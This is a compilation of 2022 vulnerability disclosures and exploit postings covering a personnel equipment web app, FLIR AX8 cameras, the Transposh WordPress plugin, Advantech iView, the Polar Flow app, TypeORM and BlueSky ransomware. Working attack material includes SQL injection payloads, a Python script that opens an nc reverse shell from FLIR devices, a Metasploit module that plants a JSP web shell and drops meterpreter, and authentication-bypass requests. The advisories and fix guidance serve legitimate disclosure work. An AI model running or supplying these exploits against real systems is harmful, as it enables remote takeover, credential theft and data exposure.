<pre><code>## Title: Personnel Property Equipment-2015-2022 SQLi,<br />Unauthenticated-File-Upload<br />## Author: nu11secur1ty<br />## Date: 08.22.2022<br />## Vendor Homepage: https://www.trickcode.in/<br />## Video vendor: https://www.youtube.com/watch?v=ltSwom8sQAQ<br />## Software https://www.trickcode.in/2021/03/personnel-property-equipment-system.html<br />## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/trickcode/Personnel-Property-Equipment<br /><br /><br />## Description:<br />The parameter `username` is vulnerable to SQLi boolean-based blind and<br />Unauthenticated-File-Upload.<br />The attacker can take all information from this system by using these<br />vulnerabilities.<br /><br />Status: Highly Vulnerable<br /><br />[+]Payload:<br />```mysql<br />---<br />Parameter: username (POST)<br /> Type: boolean-based blind<br /> Title: OR boolean-based blind - WHERE or HAVING clause (NOT)<br /> Payload: username=eFysrSeT''' OR NOT 4417=4417 OR<br />'xXab'='cbaw&password=v9A!p7s!C0<br /><br /> Type: error-based<br /> Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or<br />GROUP BY clause (FLOOR)<br /> Payload: username=eFysrSeT''' OR (SELECT 1050 FROM(SELECT<br />COUNT(*),CONCAT(0x7162716271,(SELECT<br />(ELT(1050=1050,1))),0x717a6a7a71,FLOOR(RAND(0)*2))x FROM<br />INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) OR<br />'wmfc'='yfBD&password=v9A!p7s!C0<br /><br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)<br /> Payload: username=eFysrSeT''' AND (SELECT 4473 FROM<br />(SELECT(SLEEP(5)))Pghj) OR 'lxYt'='fefH&password=v9A!p7s!C0<br />---<br />```<br /><br />## Reproduce:<br />[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/trickcode/Personnel-Property-Equipment)<br /><br />## Proof and Exploit:<br />[href](https://streamable.com/4yavk4)<br /><br /></code></pre>
<pre><code># -*- coding: utf-8 -*-

# Exploit Title: FLIR AX8 Unauthenticated OS Command Injection
# Date: 8/19/2022
# Exploit Author: Samy Younsi Naqwada (https://samy.link)
# Vendor Homepage: https://www.flir.com/
# Software Link: https://www.flir.com/products/ax8-automation/
# PoC: https://www.youtube.com/watch?v=dh0_rfAIWok
# Version: 1.46.16 and under.
# Tested on: FLIR AX8 version 1.46.16 (Ubuntu)
# CVE : CVE-2022-36266

from __future__ import print_function, unicode_literals
from bs4 import BeautifulSoup
import argparse
import sys
import requests
import urllib3
urllib3.disable_warnings()


def banner():
    flirLogo = """ 
███████╗██╗ ██╗██████╗ 
██╔════╝██║ ██║██╔══██╗
█████╗ ██║ ██║██████╔╝
██╔══╝ ██║ ██║██╔══██╗
██║ ███████╗██║██║ ██║ 
╚═╝ ╚══════╝╚═╝╚═╝ ╚═╝
 .---------------------. 
 █████╗ ██╗ ██╗ █████╗ /--'--.------.--------/| 
██╔══██╗╚██╗██╔╝██╔══██╗ |Say :) |__Ll__| [==] || 
███████║ ╚███╔╝ ╚█████╔╝ |cheese!| .--. | '''' || 
██╔══██║ ██╔██╗ ██╔══██╗ | |( () )| || 
██║ ██║██╔╝ ██╗╚█████╔╝ | | `--` | |/ 
╚═╝ ╚═╝╚═╝ ╚═╝ ╚════╝ `-------`------`------` 
 
\033[1;92mSamy Younsi (Necrum Security Labs)\033[1;m 
\033[1;91mFLIR AX8 Unauthenticated OS Command Injection\033[1;m 
 FOR EDUCATIONAL PURPOSE ONLY. 
 """
    return print('\033[1;94m{}\033[1;m'.format(flirLogo))


def pingWebInterface(RHOST, RPORT):
    # Check that the device web interface answers, then read the firmware
    # version string that the login page exposes in its title element.
    url = 'http://{}:{}/login/'.format(RHOST, RPORT)
    response = requests.get(url, allow_redirects=False, verify=False, timeout=60)
    if response.status_code != 200:
        print('[!] \033[1;91mError: FLIR AX8 device web interface is not reachable. Make sure the specified IP is correct.\033[1;m')
        sys.exit()
    try:
        soup = BeautifulSoup(response.content.decode('utf-8'), 'html.parser')
        version = soup.find('p', id='login-title').string
        print('[INFO] {} detected.'.format(version))
    except Exception:
        print('[ERROR] Can\'t grab the device version...')


def execReverseShell(RHOST, RPORT, LHOST, LPORT):
    # The unsanitized `id` POST parameter of res.php reaches shell_exec().
    url = 'http://{}:{}/res.php'.format(RHOST, RPORT)
    payload = 'rm%20%2Ftmp%2Ff%3Bmkfifo%20%2Ftmp%2Ff%3Bcat%20%2Ftmp%2Ff%7Csh%20-i%202%3E%261%7Cnc%20{}%20{}%20%3E%2Ftmp%2Ff'.format(LHOST, LPORT)
    data = 'action=alarm&id=2;{}'.format(payload)

    headers = {
        'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8',
    }

    try:
        print('[INFO] Executing reverse shell...')
        requests.post(url, headers=headers, data=data, allow_redirects=False, verify=False)
        print('Reverse shell successfully executed. {}:{}'.format(LHOST, LPORT))
        return True
    except Exception:
        print('Reverse shell failed. Make sure the FLIR AX8 device can reach the host {}:{}'.format(LHOST, LPORT))
        return False


def main():
    banner()
    args = parser.parse_args()
    pingWebInterface(args.RHOST, args.RPORT)
    execReverseShell(args.RHOST, args.RPORT, args.LHOST, args.LPORT)


if __name__ == "__main__":
    parser = argparse.ArgumentParser(description='Script PoC that exploits an unauthenticated remote command injection on FLIR AX8 devices.', add_help=False)
    parser.add_argument('--RHOST', help="Refers to the IP of the target machine. (FLIR AX8 device)", type=str, required=True)
    parser.add_argument('--RPORT', help="Refers to the open port of the target machine.", type=int, required=True)
    parser.add_argument('--LHOST', help="Refers to the IP of your machine.", type=str, required=True)
    parser.add_argument('--LPORT', help="Refers to the open port of your machine.", type=int, required=True)
    main()
</code></pre>
<pre><code># FLIR AX8 vulnerabilities.

### Product description:

The FLIR AX8 is a thermal sensor with imaging capabilities, combining thermal and visual cameras that provide continuous temperature monitoring and alarming for critical electrical and mechanical equipment.

### Affected products:
All FLIR AX8 thermal sensor cameras, versions up to and including `1.46.16`.


### Summary of the 4 vulnerabilities found:

* [CVE-2022-37061] - Unauthenticated OS Command Injection.

FLIR AX8 is affected by an unauthenticated remote command injection vulnerability. It can be exploited to inject and execute arbitrary shell commands as the root user through the `id` HTTP POST parameter of the `res.php` endpoint. A successful exploit allows the attacker to execute arbitrary commands on the underlying operating system with root privileges. This issue affects all FLIR AX8 thermal sensor cameras, versions up to and including `1.46.16`.

* [CVE-2022-37060] - Unauthenticated Directory Traversal.

FLIR AX8 is affected by a directory traversal vulnerability due to an improper access restriction. An unauthenticated, remote attacker can exploit this by sending a URI that contains directory traversal characters to disclose the contents of files located outside of the server's restricted path. This issue affects all FLIR AX8 thermal sensor cameras, versions up to and including `1.46.16`.

* [CVE-2022-37062] - Improper Access Control.

FLIR AX8 is affected by an insecure design vulnerability due to an improper directory access restriction. An unauthenticated, remote attacker can exploit this by sending a URI that contains the path of the SQLite users database and downloading it. A successful exploit allows the attacker to extract usernames and hashed passwords. This issue affects all FLIR AX8 thermal sensor cameras, versions up to and including `1.46.16`.

* [CVE-2022-37063] - Reflected cross-site scripting.

FLIR AX8 is affected by a reflected cross-site scripting (XSS) vulnerability due to improper input sanitization. An authenticated, remote attacker can execute arbitrary JavaScript code in the web management interface. A successful exploit allows the attacker to inject malicious JavaScript code. This issue affects all FLIR AX8 thermal sensor cameras, versions up to and including `1.46.16`.

### Step-by-step example (how to reproduce and verify the vulnerabilities):

1. Unauthenticated Remote Command Injection.

The endpoint `/res.php` can be called remotely without user authentication, as there is no cookie verification (`Cookie: PHPSESSID=ID`) to check that the request is legitimate. The second problem is that the POST parameter `id` can be injected with arbitrary Linux commands. In the example below we create a crafted query that displays the contents of the `/etc/shadow` file.

The server returns a JSON response containing the contents of the `/etc/shadow` file. This command injection exists because there is no sanitization check on the variable `$_POST["id"]` (line 65), which is then handed to the `shell_exec()` function and therefore executes unexpected arbitrary shell commands.

2. Unauthenticated Directory Traversal.

The endpoint `/download.php` can be called remotely without user authentication, as there is no cookie verification (`Cookie: PHPSESSID=ID`) to check that the request is legitimate. The second problem is that the GET parameter `file` accepts a relative file path, which allows any file on the system to be downloaded. In the example below we create a crafted query that downloads the contents of the `/etc/passwd` file.

The error is due to the fact that there is no sanitization of the `$file_path` variable (line 26) when the `fopen()` function is called (line 39). However, a comment in the code (line 24) and the use of the `pathinfo()` function (line 28) suggest that the developer thought about this problem and therefore created the sanitized variable `$path_parts`. But for some reason the developer does not use the sanitized variable `$path_parts` when `fopen()` is called. Probably an oversight.

3. Improper Access Control.

The endpoint `/FLIR/db/users.db` can be called remotely without user authentication, as there is no cookie verification (`Cookie: PHPSESSID=ID`) to check that the request is legitimate, which lets any malicious actor download the `users.db` SQLite database.

4. Reflected cross-site scripting.

In the settings tab, if a file whose filename contains JavaScript code is selected via the "update firmware" file input, the JavaScript code is triggered and executed. In our example, we created a file called 

<img src=x onerror=alert(String.fromCharCode(97,108,101,114,116,40,39,116,101,115,116,39,41,59));>.run


### Recommendations for how to fix the 4 vulnerabilities:

* Vulnerability 1: The variable `$_POST["id"]` (line 65 in the file `/FLIR/usr/www/res.php`) must be sanitized using the `intval()` function, which removes any character other than an integer value. `escapeshellcmd()` and `escapeshellarg()` must also be used to escape any characters in a string that might be used to execute arbitrary commands.

More info: 
https://www.php.net/intval
https://www.php.net/manual/en/function.escapeshellcmd
https://www.php.net/manual/en/function.escapeshellarg


* Vulnerability 2: The variable `$file_path` (line 39 in the file `/FLIR/usr/www/download.php`) must be sanitized using the `pathinfo()` function, and a hard-coded directory path must also be used; if several directories need to be managed, define a whitelist of all allowed directories and check the path against each of them.

More info:
https://www.php.net/manual/en/function.pathinfo

* Vulnerability 3: Define a whitelist of all directories that a user is allowed to access. This can be added to the Lighttpd server configuration file, `/etc/lighttpd.conf`.

More info:
https://www.cyberciti.biz/tips/howto-lighttpd-enable-disable-directory-listing.html

* Vulnerability 4: To protect against a filename XSS attack, use a regex that parses the filename and keeps only numbers and letters.

More info: 
https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html

### Reference:
https://www.flir.com/products/ax8-automation/

### Security researchers:
* [Thomas Knudsen](https://www.linkedin.com/in/thomasjknudsen)
* [Samy Younsi](https://www.linkedin.com/in/samy-younsi)
</code></pre>
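As an added illustration of the fixes recommended for vulnerabilities 1 and 2 above (this is not code from the advisory or from FLIR), the PHP below shows a strict `id` check for `res.php` and a whitelisted file lookup for `download.php`; the helper path `/usr/bin/alarm_tool`, the directories in `ALLOWED_DIRS` and the function names are assumptions.

```php
<?php
declare(strict_types=1);

// Added example, not FLIR's code. The command path, the directory list and the
// function names are assumptions made for this illustration.

/**
 * Vulnerability 1 (res.php): the alarm id must be a plain integer before it can
 * reach any shell call. A strict digit check rejects tampering outright; intval()
 * and escapeshellarg() are kept as the advisory recommends, so the value stays a
 * single harmless argument even if the check is ever loosened later.
 */
function buildAlarmCommand(string $rawId): ?string
{
    if (!preg_match('/^\d{1,9}\z/', $rawId)) {
        return null; // caller should answer 400 and log the rejected value
    }
    $id = intval($rawId);
    // /usr/bin/alarm_tool is an assumed placeholder for the device's real helper.
    return '/usr/bin/alarm_tool ' . escapeshellarg((string) $id);
}

/**
 * Vulnerability 2 (download.php): only a bare file name is accepted, never a
 * path, and the resolved file must sit inside one of a fixed list of directories.
 */
const ALLOWED_DIRS = ['/FLIR/usr/www/export', '/FLIR/usr/www/logs']; // assumed

function resolveDownloadPath(string $requested): ?string
{
    // pathinfo() keeps the last path component only, so "../../etc/passwd"
    // collapses to "passwd" and directory components are never honoured.
    $name = pathinfo($requested, PATHINFO_BASENAME);
    if ($name === '' || $name === '.' || $name === '..' || strpos($name, "\0") !== false) {
        return null;
    }
    foreach (ALLOWED_DIRS as $dir) {
        $base = realpath($dir);
        if ($base === false) {
            continue; // directory missing on this device, try the next one
        }
        // realpath() resolves symlinks and "..", and returns false for files that
        // do not exist; the prefix test then proves the target is under $base.
        $full = realpath($base . DIRECTORY_SEPARATOR . $name);
        $prefix = $base . DIRECTORY_SEPARATOR;
        if ($full !== false && strncmp($full, $prefix, strlen($prefix)) === 0) {
            return $full;
        }
    }
    return null;
}

// Usage inside the handlers (constructed; mirrors the $_POST["id"] and
// GET "file" parameters named in the advisory).
$cmd = buildAlarmCommand((string) ($_POST['id'] ?? ''));
if ($cmd === null) {
    http_response_code(400);
    exit;
}
$alarmOutput = shell_exec($cmd);

$path = resolveDownloadPath((string) ($_GET['file'] ?? ''));
if ($path === null) {
    http_response_code(404);
    exit;
}
readfile($path);
```

Rejecting the request rather than silently coercing it (intval("2;uptime") would return 2) keeps a record of tampering attempts in the web server log.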
<pre><code>RCE Security Advisory<br />https://www.rcesecurity.com<br /><br /><br />1. ADVISORY INFORMATION<br />=======================<br />Product: Transposh WordPress Translation<br />Vendor URL: https://wordpress.org/plugins/transposh-translation-filter-for-wordpress/<br />Type: Incorrect Authorization [CWE-863]<br />Date found: 2022-07-23<br />Date published: 2022-08-16<br />CVSSv3 Score: 7.5 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N)<br />CVE: CVE-2022-2536<br /><br /><br />2. CREDITS<br />==========<br />This vulnerability was discovered and researched by Julien Ahrens from<br />RCE Security.<br /><br /><br />3. VERSIONS AFFECTED<br />====================<br />Transposh WordPress Translation 1.0.8.1 and below<br /><br /><br />4. INTRODUCTION<br />===============<br />Transposh translation filter for WordPress offers a unique approach to blog<br />translation. It allows your blog to combine automatic translation with human<br />translation aided by your users with an easy to use in-context interface.<br /><br />(from the vendor's homepage)<br /><br /><br />5. VULNERABILITY DETAILS<br />========================<br />When installed, Transposh comes with a set of pre-configured options; one of these<br />is the "Who can translate" setting under the "Settings" tab. However, this option<br />is ignored if Transposh has enabled its "autotranslate" feature (it's enabled by<br />default) and the HTTP POST parameter "sr0" is larger than 0. This is caused by a<br />faulty validation in "wp/transposh_db.php":<br /><br />if (!$by && !($all_editable &&<br /> ($this->transposh->is_translator() || ($source > 0 && $this->transposh->options->enable_autotranslate)))) {<br /> tp_logger("Unauthorized translation attempt " . 
$_SERVER['REMOTE_ADDR'], 1);<br /> header("HTTP/1.0 401 Unauthorized translation");<br /> exit;<br />}<br /><br />Successful exploits can allow an unauthenticated attacker to bypass the Transposh<br />permissions and add translations to the WordPress site, thereby influencing what<br />is shown on the site. However, this only affects new translations.<br /><br /><br />6. PROOF OF CONCEPT<br />===================<br />The following Proof-of-Concept adds a new translation<br /><br />POST /wp-admin/admin-ajax.php HTTP/1.1<br />Host: [host]<br />Content-Length: 74<br />Content-Type: application/x-www-form-urlencoded; charset=UTF-8<br />User-Agent: Mozilla/5.0<br />Connection: close<br /><br />action=tp_translation&ln0=en&sr0=1&items=1&tk0=translation&tr0=translation<br /><br /><br />7. SOLUTION<br />===========<br />None. Remove the plugin to prevent exploitation.<br /><br /><br />8. REPORT TIMELINE<br />==================<br />2022-07-23: Discovery of the vulnerability<br />2022-07-23: CVE requested from Wordfence (CNA)<br />2022-07-25: Wordfence assigns CVE-2022-2536<br />2022-08-09: Sent note to vendor<br />2022-08-09: Vendor is aware of this bug, but there is no plan to fix it yet<br />2022-08-16: Public Disclosure<br /><br /><br />9. REFERENCES<br />=============<br />https://github.com/MrTuxracer/advisories<br /></code></pre>
<pre><code>##<br /># This module requires Metasploit: https://metasploit.com/download<br /># Current source: https://github.com/rapid7/metasploit-framework<br />##<br /><br />class MetasploitModule < Msf::Exploit::Remote<br /> Rank = ExcellentRanking<br /><br /> include Msf::Exploit::CmdStager<br /> include Msf::Exploit::Remote::HttpClient<br /> prepend Msf::Exploit::Remote::AutoCheck<br /> include Msf::Exploit::FileDropper<br /><br /> def initialize(info = {})<br /> super(<br /> update_info(<br /> info,<br /> 'Name' => 'Advantech iView NetworkServlet Command Injection',<br /> 'Description' => %q{<br /> Versions of Advantech iView software below `5.7.04.6469` are<br /> vulnerable to an unauthenticated command injection vulnerability<br /> via the `NetworkServlet` endpoint.<br /> The database backup functionality passes a user-controlled parameter,<br /> `backup_file` to the `mysqldump` command. The sanitization functionality only<br /> tests for SQL injection attempts and directory traversal, so leveraging the<br /> `-r` and `-w` `mysqldump` flags permits exploitation.<br /> The command injection vulnerability is used to write a payload on the target<br /> and achieve remote code execution as NT AUTHORITY\SYSTEM.<br /> },<br /> 'License' => MSF_LICENSE,<br /> 'Author' => [<br /> 'rgod', # Vulnerability discovery<br /> 'y4er', # PoC<br /> 'Shelby Pace' # Metasploit module<br /> ],<br /> 'References' => [<br /> [ 'URL', 'https://y4er.com/post/cve-2022-2143-advantech-iview-networkservlet-command-inject-rce/'],<br /> [ 'CVE', '2022-2143']<br /> ],<br /> 'Platform' => [ 'win' ],<br /> 'Privileged' => true,<br /> 'Arch' => [ ARCH_X86, ARCH_X64, ARCH_CMD ],<br /> 'Targets' => [<br /> [<br /> 'Windows Dropper',<br /> {<br /> 'Arch' => [ ARCH_X86, ARCH_X64 ],<br /> 'Type' => :win_dropper,<br /> 'CmdStagerFlavor' => [ 'psh_invokewebrequest', 'vbs' ],<br /> 'DefaultOptions' => { 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp' }<br /> }<br /> ],<br /> [<br /> 'Windows 
Command',<br /> {<br /> 'Arch' => ARCH_CMD,<br /> 'Type' => :win_cmd,<br /> 'DefaultOptions' => { 'PAYLOAD' => 'cmd/windows/powershell_reverse_tcp' }<br /> }<br /> ]<br /> ],<br /> 'DisclosureDate' => '2022-06-28',<br /> 'DefaultTarget' => 0,<br /> 'Notes' => {<br /> 'Stability' => [ CRASH_SAFE ],<br /> 'Reliability' => [ REPEATABLE_SESSION ],<br /> 'SideEffects' => [ IOC_IN_LOGS, ARTIFACTS_ON_DISK ]<br /> }<br /> )<br /> )<br /><br /> register_options(<br /> [<br /> Opt::RPORT(8080),<br /> OptString.new('TARGETURI', [ true, 'The base path to Advantech iView', '/iView3']),<br /> OptString.new('USERNAME', [ false, 'The user name to authenticate with', 'admin']),<br /> OptString.new('PASSWORD', [ false, 'The password to authenticate with', 'password'])<br /> ]<br /> )<br /> end<br /><br /> def check<br /> res = send_request_cgi!(<br /> 'method' => 'GET',<br /> 'uri' => normalize_uri(target_uri.path)<br /> )<br /><br /> return CheckCode::Unknown('Failed to receive a response from the application') unless res<br /><br /> unless res.body.include?('iView')<br /> return CheckCode::Safe('No confirmation that target is Advantech iView')<br /> end<br /><br /> res = send_db_backup_request('')<br /> return CheckCode::Detected('Failed to receive response from backup request') unless res<br /><br /> # The patch added auth as a requirement for<br /> # accessing the NetworkServlet endpoint<br /> if res.body =~ /ERROR:\s+User\s+Not\sLogin/<br /> @needs_auth = true<br /> print_status('Vulnerability is present, though authentication is required.')<br /> end<br /><br /> CheckCode::Appears<br /> end<br /><br /> def send_db_backup_request(filename)<br /> send_request_cgi(<br /> 'method' => 'POST',<br /> 'uri' => normalize_uri(target_uri.path, 'NetworkServlet'),<br /> 'keep_cookies' => true,<br /> 'vars_post' =><br /> {<br /> 'page_action_type' => 'backupDatabase',<br /> 'backup_filename' => filename<br /> }<br /> )<br /> end<br /><br /> def format_jsp<br /> bin_nums = []<br /> arg_nums 
= []<br /> flag_nums = []<br /><br /> bin_param.each_char { |c| bin_nums << c.ord }<br /> bin_nums = bin_nums.join(',')<br /> arg_param.each_char { |c| arg_nums << c.ord }<br /> arg_nums = arg_nums.join(',')<br /> flag_param.each_char { |c| flag_nums << c.ord }<br /> flag_nums = flag_nums.join(',')<br /><br /> '<%=new String(com.sun.org.apache.xml.internal.security.utils.JavaUtils.getBytesFromStream((' \<br /> 'new ProcessBuilder(request.getParameter(' \<br /> "new java.lang.String(new byte[]{#{bin_nums}}))," \<br /> "request.getParameter(new java.lang.String(new byte[]{#{flag_nums}}))," \<br /> "request.getParameter(new java.lang.String(new byte[]{#{arg_nums}}))).start())" \<br /> '.getInputStream()))%>'<br /> end<br /><br /> def flag_param<br /> @flag_param ||= Rex::Text.rand_text_alpha(3..8)<br /> end<br /><br /> def arg_param<br /> @arg_param ||= Rex::Text.rand_text_alpha(3..8)<br /> end<br /><br /> def bin_param<br /> @bin_param ||= Rex::Text.rand_text_alpha(3..8)<br /> end<br /><br /> def jsp_filename<br /> @jsp_filename ||= "#{Rex::Text.rand_text_alpha(5..12)}.jsp"<br /> end<br /><br /> def execute_command(cmd, _opts = {})<br /> send_request_cgi(<br /> 'method' => 'GET',<br /> 'uri' => normalize_uri(target_uri.path, jsp_filename),<br /> 'keep_cookies' => true,<br /> 'vars_get' =><br /> {<br /> bin_param => 'cmd.exe',<br /> flag_param => '/c',<br /> arg_param => cmd<br /> }<br /> )<br /> end<br /><br /> def iview_authenticate<br /> res = send_request_cgi!(<br /> 'method' => 'GET',<br /> 'uri' => normalize_uri(target_uri.path)<br /> )<br /><br /> fail_with(Failure::UnexpectedReply, 'Login page not found') unless res && res.body.include?('loginWindow')<br /> vprint_good('Successfully accessed the login page')<br /><br /> res = send_request_cgi(<br /> 'method' => 'POST',<br /> 'uri' => normalize_uri(target_uri.path, 'CommandServlet'),<br /> 'keep_cookies' => true,<br /> 'vars_post' => {<br /> 'page_action_service' => 'UserServlet',<br /> 'page_action_type' => 
'login',<br /> 'user_name' => datastore['USERNAME'],<br /> 'user_password' => datastore['PASSWORD'],<br /> 'use_ldap' => 'false',<br /> 'data' => ''<br /> }<br /> )<br /><br /> unless res && res.body.include?('Success')<br /> fail_with(Failure::BadConfig, 'Authentication failed. Credentials likely incorrect.')<br /> end<br /> vprint_good('Authentication successful!')<br /> end<br /><br /> def need_auth?<br /> res = send_request_cgi(<br /> 'method' => 'GET',<br /> 'uri' => normalize_uri(target_uri.path, 'NetworkServlet')<br /> )<br /> return false unless res<br /><br /> !!(res.body =~ /ERROR:\s+User\s+Not\sLogin/)<br /> end<br /><br /> def exploit<br /> if @needs_auth || need_auth?<br /> iview_authenticate<br /> end<br /><br /> jsp_code = format_jsp<br /><br /> sql_filename = "#{Rex::Text.rand_text_alpha(5..12)}.sql"<br /> full_cmd = "#{sql_filename}\" -r \"./webapps/iView3/#{jsp_filename}\" -w \"#{jsp_code}\""<br /><br /> res = send_db_backup_request(full_cmd)<br /> fail_with(Failure::UnexpectedReply, 'Failed to write JSP file to target') unless res<br /><br /> path = "webapps\\iView3\\#{jsp_filename}"<br /> register_file_for_cleanup(path)<br /> if target['Type'] == :win_dropper<br /> execute_cmdstager<br /> else<br /> execute_command(payload.encoded)<br /> end<br /> end<br />end<br /></code></pre>
<pre><code># Trovent Security Advisory 2110-01 #
#####################################


Insecure data storage in Polar Flow Android application
#######################################################


Overview
########

Advisory ID: TRSA-2110-01
Advisory version: 1.0
Advisory status: Public
Advisory URL: https://trovent.io/security-advisory-2110-01
Affected product: Polar Flow Android mobile application (fi.polar.polarflow)
Affected version: 5.7.1
Vendor: Polar Electro, https://flow.polar.com
Credits: Trovent Security GmbH, Karima Hebbal


Detailed description
####################

The Polar Flow app is a sports, fitness and activity analyzer which allows the user to plan
and monitor training, daily activity and sleep.
Trovent Security GmbH discovered that the application stores the username and
password in clear text in a file on the mobile device.

Severity: Medium
CVSS Score: 4.4 (CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N)
CVE ID: N/A
CWE ID: CWE-312


Proof of concept
################

Content of the file /data/data/fi.polar.polarflow/shared_prefs/UserData3.xml:

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
<?xml version='1.0' encoding='utf-8' standalone='yes' ?>
<map>
    <string name="current_device_id">no_device</string>
    <int name="last_version_code" value="5070103" />
    <string name="base_url">https://www.polarremote.com/v2/users/54871065</string>
    <string name="last_name">Ptest</string>
    <int name="key_initial_view_resource_id" value="2131363187" />
    <boolean name="valid_ver_two" value="true" />
    <long name="problem_phone_message_time" value="1634888249727" />
    <boolean name="new_blogs_available" value="true" />
    <string name="address_json">{"city":"\u003cscript\u003ealert(1)\u003c/script\u003e","countryCode":"DE","modified":"2021-10-22T07:37:53.000Z"}</string>
    <string name="profile_json">{"favoriteSports":[]}</string>
    <string name="password">Test2021</string>
    <string name="last_blog_sync_time">2021-10-22T09:37:18.309</string>
    <long name="user_id" value="54871065" />
    <boolean name="initial_remote_sync_executed" value="true" />
    <string name="preferred_blog_language">en</string>
    <int name="key_training_diary_tab" value="0" />
    <string name="first_name">Ptest</string>
    <int name="should_show_problem_phone_message" value="2" />
    <string name="username">ptesttest11@gmail.com</string>
</map>

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~


Solution / Workaround
#####################

We recommend not storing sensitive information in clear text on the mobile
device.

Fixed in version 6.3.0, verified by Trovent.


History
#######

2021-10-18: Vulnerability found
2021-12-15: Vendor contacted
2022-01-20: Contacted vendor again
2022-01-21: Vendor replied that the vulnerability will be checked
2022-01-28: Vendor replied, the vulnerability will be fixed in a future update
2022-07-27: Vendor contacted, asking for status
2022-08-09: Vendor replied, the vulnerability is fixed since version 6.3.0
2022-08-17: Trovent verified remediation of the vulnerability
2022-08-18: Advisory published
</code></pre>
<pre><code>I found what I think is a vulnerability in the latest typeorm 0.3.7.<br />TypeORM v0.3 has a new findOneBy method instead of findOneById() and it is<br />the only way to get a record by id<br /><br />Sending undefined as a value in this method removes this parameter from the<br />query. This leads to the data exposure.<br /><br />For example:<br />Users.findOneBy({id: req.query.id}) with /?id=12345 produces SELECT * FROM<br />Users WHERE id=12345 LIMIT 1 while removing id from the query string<br />produces SELECT * FROM Users LIMIT 1<br /><br />Maintainer also does not consider this a vulnerability and stated the<br />root cause is bad input validation. I tried to contact Snyk, but they<br />took the author's position. I still think it is a major vulnerability<br /><br /><br />Vulnerable app:<br /><br /><br />import {<br /> Entity,<br /> PrimaryGeneratedColumn,<br /> Column,<br /> Connection,<br /> ConnectionOptions,<br /> Repository,<br /> createConnection<br />} from 'typeorm';<br />import express from 'express';<br />import {Application, Request, Response} from 'express';<br /><br />let connection: Connection;<br /><br />async function myListener(request: Request, response: Response) {<br /> if(!connection)<br /> connection = await createConnection(connectionOpts);<br /> const userRepo: Repository<User> = connection.getRepository(User);<br /><br /> const { email, password }: Record<string, string> = request.body;<br /> const user = await userRepo.findOneBy({ email, password });<br /> return response.json(user ? 
'ok' : 'denied');<br />}<br /><br />@Entity({ name: 'Users' })<br />class User {<br /> @PrimaryGeneratedColumn()<br /> id!: number;<br /> @Column()<br /> email!: string;<br /> @Column()<br /> password!: string;<br />}<br /><br />const connectionOpts: ConnectionOptions = {<br /> type: 'mysql',<br /> name: 'myconnection',<br /> host: 'localhost',<br /> username: 'root',<br /> password: 'test123',<br /> database: 'domurl',<br /> entities: [User]<br />}<br /><br />const app: Application = express();<br />app.use(express.json());<br />app.post( "/authenticate", myListener);<br />app.listen(4444, () => console.log('App started'));<br /><br /><br />Usage:<br /><br />curl http://127.0.0.1:4444/authenticate -H 'Content-Type:<br />application/json' --data '{"email": "Flo64@yahoo.com", "password":<br />"incorrect"}'<br />"denied"⏎<br /><br /><br />Exploit:<br /><br />curl http://127.0.0.1:4444/authenticate -H 'Content-Type:<br />application/json' --data '{"email": "Flo64@yahoo.com"}'<br />"ok"⏎<br /></code></pre>
<pre><code>Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2022
Original source: https://malvuln.com/advisory/961fa85207cdc4ef86a076bbff07a409.txt
Contact: malvuln13@gmail.com
Media: twitter.com/malvuln

Threat: Win32.Ransom.BlueSky
Vulnerability: Arbitrary Code Execution
Description: The BlueSky ransomware looks for and executes arbitrary DLLs in its current working directory. Therefore, we can hijack a vulnerable DLL, execute our own code, and control and terminate the malware pre-encryption. The exploit DLL checks whether the current directory is "C:\Windows\System32"; if not, we grab our own process ID and terminate. All basic tests were conducted successfully in a virtual machine environment.
Family: BlueSky
Type: PE32
MD5: 961fa85207cdc4ef86a076bbff07a409
Vuln ID: MVID-2022-0632
Disclosure: 08/13/2022
PoC Video URL: https://www.youtube.com/watch?v=osuS8GjdERM

Exploit/PoC:
1) Compile the following C code as a 32-bit "CRYPTSP.dll"
2) Place the DLL in the same directory as the vulnerable BlueSky ransomware
3) Run the malware

#include <windows.h>
#include <string.h>   /* strcmp */

//By malvuln - August 2022
//Purpose: PWN BlueSky ransomware MD5: 961fa85207cdc4ef86a076bbff07a409
//gcc -c CRYPTSP.c -m32
//gcc -shared -o CRYPTSP.dll CRYPTSP.o -m32
/** DISCLAIMER:
Author is NOT responsible for any damages whatsoever by using this software or improper malware
handling. By using this code you assume and accept all risk implied or otherwise.
**/
BOOL APIENTRY DllMain(HINSTANCE hInst, DWORD reason, LPVOID reserved){
    switch (reason) {
    case DLL_PROCESS_ATTACH: {
        MessageBox(NULL, "BlueSky Ransom\nPWNED!!! by Malvuln", "Code Exec PoC", MB_OK);
        /* Only act when loaded from somewhere other than the real System32,
           i.e. when the ransomware picked this DLL up from its own directory. */
        TCHAR buf[MAX_PATH];
        if(GetCurrentDirectory(MAX_PATH, buf))
            if(strcmp("C:\\Windows\\System32", buf) != 0){
                /* GetCurrentProcessId() needs no extra header, unlike getpid() */
                HANDLE handle = OpenProcess(PROCESS_TERMINATE, FALSE, GetCurrentProcessId());
                if (NULL != handle) {
                    TerminateProcess(handle, 0);  /* kill the host process pre-encryption */
                    CloseHandle(handle);
                }
            }
        break;
    }
    }
    return TRUE;
}


